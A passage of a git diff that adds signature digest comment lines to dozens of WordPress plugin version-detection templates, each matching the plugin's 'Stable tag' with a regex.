4a0a00473045022100a4de5a931fce5d5d34dd816472b3dcdcfa036cc1880c8e4d208b92a201a3798b02203f68b59daa3acf4d24b0b2400a94f0ab6b629b09f50d5c7ebe019852946cc5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6c..2fb21ebd191 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204df94a47e55fa8437071e101e3c782e916e841f5d9695209715cc006ceefdbed02201a612f6f6322d3c3ccf10924a38a86ac6e58d0d89e69e8f8a6bab512d8283f77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35a..daa8a89f1a5 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a55fd33d29e0138b9a91dc7b6ec2083f0edbc66504487b8a9abc93111795a7b802203928e312bad9f05be2eeb241da1ba630ec1b71a04eddb51c5ea73c7fe4c41348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4fa..43dc5974c1c 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203780774630eb0b80372c6d1c86ce2f7d0e7407408c8d8c5fdfc0a3292e698838022100c29ff7b64957923834c61a261aaae9c920d279d90975f7cf0eb45b6307b7105b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf72..e415e173d11 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017f0ac373d219a2b740f5f6f317e2bed573d250fc8fd11dd63d446eede525e5e0221009d4e23851c6be23f1f2fa8493c8f9d35438206b8acf4e5bd15b3288136e3c771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f7..bd7699f6ec9 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9250325a9c7b7bf3460eb368738763c2e4abbbb3c17514ac499ea928f938e96022100e739dc38ea3d2f9f08245382bca490102d0bd62cacc1cf4c669f542439c5491f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf10..5d442c68c73 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c74eb22070b786cb852fec72eb6a217cf1ec975219120201cebc771d042ff3d02201f37977697fd5e89423aba864d38ae153c68fb0231f0ddf6c7c242dfde73f3c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7cf..2924cceec7b 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca167159b715e7342af379315916c39a861d8fa1db494f49d4eeb0d4c58b042402204347670b2bbda4f8ded5efefe53149deb9769054bb1112a150b9642e1a599b5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb44838..6e98acaa55a 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022063cdb8f40f47d59c3dbbac969cd1cafd1e53454ba2f9234499fdfbb8d8928321022100dceef35ba7254ec3fa06978f8cf1469d8051eaa0ae416d8804d333ba272d96ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdfc..715b7f9fc00 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202be7e42c76f37c1804b3a7283733b749531c3d04dd1be789cb0f13ad48880846022100e97e4a20e5af59389db0388a34278a8d2ed1a4badaab6513759f1069f61a000d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b4..2262ae47b81 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050761b6503c98f01561111871f9b8eff789ba96db31353e4d908d93c424d3d9202202d9b78c5aa704d3b35e31d1659c93e85e674c2c99d616c21ffcfd79a8fcc9f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbbab..0c61bacf17f 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210097c9b45a2b0b5ad0d4b20b7151a581cbfdb78425f011984f1d81fe27e798bae202204649eda04f8d32a1bd16d38e17905cae24a61e545207e437a74409d43bf33708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb9..62a5c2791a6 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093208f4544374ead9506bd1274675b2d92afb9d12d6b336d07330d3b7d72d520022059a822256b284f210bdf8653d3a10a97004e074320ec5cd1d0ce66fd37d7b3b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d1..67b382c9a4b 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f813791da6cc7113b0d45b986d1c705b6fe329dd430e0555cb06c588c76fd3c02206c6ff0d281972bc079ff8342dfb33eb165182de4bd42263fc2fdc802b04970cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d1..7cea6156853 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f73fe06556ca4f14e6dbefd0574e1f4a1aed39038be0cc266519a51131adcada022100f3f88eaa0d3be61fecb6f65ba1c56aefd5996813813c6862c6ebccbebf366abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a90..5f30c9078da 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be3fa22aff21f7db47174dce95fdc5448a1dd087a4ed3e9047600af7bbff593e022100e5b6f5e099925e40598dbe6554c6301dea8b3c8e983d1579a72a2e6d5acec917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa297068720..d67838e39cf 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099f5e88a5d21c69667d22e471b9113511a354419da86194c1880a4ee7f73719d02200726c12e2486232ad6185b5d0d8f95526741e76867adcb4edefc4c7b77e5e093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7ed..62976fadac5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008855339c7751b360e33b130b461233c593c6a30423f18462ca2857fe7d59b02f022100bfbd7ddca6bead14e3e312460edb487edd28b98911bbfe27a20fab442e1aa93f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e78..a099a483a09 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201013c5bbbcab93d63627dfeca448d2481d0a84656d2ff76777523f1942a36a68022100ecb7b63531f2bbdc2ca51fabb471c862dd87a60fcab5e528a2f03a42e124c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2a..8fa01a96e72 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d7a0824c64cac98d593febc8f31b009126933752c3e9d27f7fbfed3e82725ea02202bc9e186b674790e3bcf1d4694f9dd5c0879248b64d84c6ceb2a6b3189146985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8a..0741418c0d0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b77f3b600a06cbbf5fd625f623a3b21caadc7d0c6f665b71f8cc535c27ccceb9022100fb8e58140097038269b37cd2a6021df8aa77237aff6dcb61773cd6bc1c0adffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5c..895cdb890e4 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b54da4213f440867f265f89f3691ba60dc03f536bae6561ff68e661937b49990022100eca20a2bb85cd12a4cfca7582a6b8a0a4acbc6e8c9af0233261410bf72f1318b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d97506..0e1994a4fcb 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a38fe02b7265c26c09d083403e553b939a8e12857204c36c7b89e7c7328e4ba0022100e9db293cf44de1a5c082216149e10a94c76af90532fbb0aab04c6e3970224474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab22..4314a4073be 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220490cbdf83a0c7138b5a22ac57849dc5bcc6a5a9f0d8768c8f26ccf9bd73b90d2022100ff5dee04a1d41a2abcb9d30ae0fd8d9ab214e6959050e8fc9703a22b9ccde6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f8..628dae26e63 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0460b28e72144a570127a8a152d0a1df737c4739caf5b363463da3ae50def010221009bbed5b55f4da0a4ca2d5399a40654a19c08c0a03808078a3f6ca3cb7ac6f52f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a8..7e505846ff5 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f0bc1e6e42412e800058e3a38a3359014075f7ac76b91a4129e0d495770c7bc022100a1d4850a69daa1df5a4a6ddccb2d5d3e0166325199c21a79ba5a9e3d4c39def8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8b..fc5dee5b002 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201b48c84fc07db2502c03f777a2a67e414369635f96fa1368db46c4d1e1ff86c8022100c836f1fc9cf3962922c1c93f35a066ba78ad5866d3c31ed6c6fa99dea9a73481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486a..54f14ff4399 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009b6da2d686ac6a328e6e91ffa150a155418984677df6bdebb65967ab9e85d76802202faa25a0478e896185597b7b3cafab51d67b08f3b2eb16c84c6e4bfe94c86f13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a69..51b323580a7 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b7217d896958cb05697bb3a37e8cf0a3dcdf43013986ebc289178643cd6b0960022054842db494950f0c1e2179b41c7ded3dad71eff105402496181ebae25c7901f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc839..e0e73ec0156 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d349af52ec14d5a3159d65c082a65a987efc95ca24153d8780f3dd3a4238100a022100c6c95d51fc5f70ad3cbd948af45e7cbf471841672fd232fa0da0817214671b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb8..f16ad833e4a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f00ea28c2555739c2f201991b222d8726994383aba5e12ef181c730cdf6514ed02201983698d472efbf280b8e83143928eb2a82026b283a1eb8a990db9d6e018469a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53a..35804d6210e 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030cd35a3a89bbc9792988aa02e4c66df96b19b332dc9e313363dc5201602001802205e82fb8496a6cd9056ac66599f3341d023d68524d097438727eab096feb73501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f01359..adf53f064f9 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205212c8b7e83bf81f59d32a4ce8101641b6d77e7bb070cd54da5c5c36ac211d170221008f4cb36e35eb3a4df0930fee33903405d4d69d01dd1518755b4989674d15afde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c7..70fd52525e7 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068c352046b38d5de9b968796c6a0ad507f44de816accb907376cd96f69bcc6d0022100cde26b7eda7a1e9ee7ab5a0cd8a347ec776eec6ce428ef848e9991cc35a35db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd7..cf22cab68ea 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c55434dd9d277759778ccc2e79706aa230036bf1a068552eab760e0e1d144f6b022012ea0155c4342079df63a9c5300c02f6ae3017450b9d6156646af41e74a55d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08d..d885ff3faee 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd48a444f2baf63545e75757601e66d9d20a290b13b51fc8dd64fdbfd929c35f022100abd7003d6c190eb5c4215ea5b1060258c4440d4fadcce4c4b0bd735c2f5dcb74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e99..6f9da74cae9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206d4b5a920160c8cd6b93b436ef63f1177b14a8af414b7fa18a1c3d4f5811709d02207e1a424affe390f466f6f69c1b2c4bbf9c9b462450559625a17cc2e87674d1a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf55667..dc84f1c6a49 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203aa723dd4aee2c9e596cfbd43b1d1b018b3210aa953a9aed070fe68536e31a1d022100e92ac3098771e4a2ab26c43e267d5ecf2993e3c770c3ee193913ec95e5067aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac74..29214c89401 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022059721dd8b02050eeeef7211d6ddc8c6f5c327d8bcf9bac29cd1d264db14742330221008e65617e4e31fbed04b338e435c9b4dae3c57094c332d01f6c9a969316dab4d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df49..9977df376fa 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd6e114fd42a31c3e0024f68927972b9b67535592094cdc1e322047afe917efc02207af3b38a929f8ebe39b4904baef73a3104b1c7b5e9e19d1d93f29bfbfe93e914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee0467..78a69d103ec 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e8e67df2e82cebd4ef73b5fc34caca32343da02ac08327167b257aca2696b4fb02210094b71c31669b3a9a84887054bcdfd88de08783c30f6ae542d42c93aa779c76fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0d..b1726192cd9 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a13deec49f9210240a8bea9315ec997f64157909437278302166238cf5626b30022047c30dcc5043a96f954af02341c3f4337d22ac4cbdb67b2f51cef5ba8e673507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff55..0679a001f35 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5ab2b278c189539908d5eb36294ffc0342917bd26b7208d91d570f93fd4d35e022100dddc49e08813e1fc47b2483923352ce00e311c047576c6c26a0033998b71db8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e3..79a4a0ea2c4 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b688a4888b077484fe596645fc8ac3f488e39e8439c21dfcbf9727a568d8eea022100b2dd0b7680ff49c9209522a2434f59e96a67b264d18ea18091237d6e9de2d550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed6..47d6d3fc03f 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022054893c90d92a403505a413ae3d9ecc986fd27d89b3820c8b8da9c42c81ca4f5b022059f923045b7a8e9bfa6efabef8f37af25dfc56aaae8e0335f47725587439d1fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a172..be61093ee30 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220399e770a7d511e3c609d2f16df9b710e2a1ccb6e95a9662431c3b8e2d01954c002203839aee43d2f0ee06a605f4363cae3ed8275f86076d9b8ca0eb04dd6d3825746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afebd..51c453e66ea 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 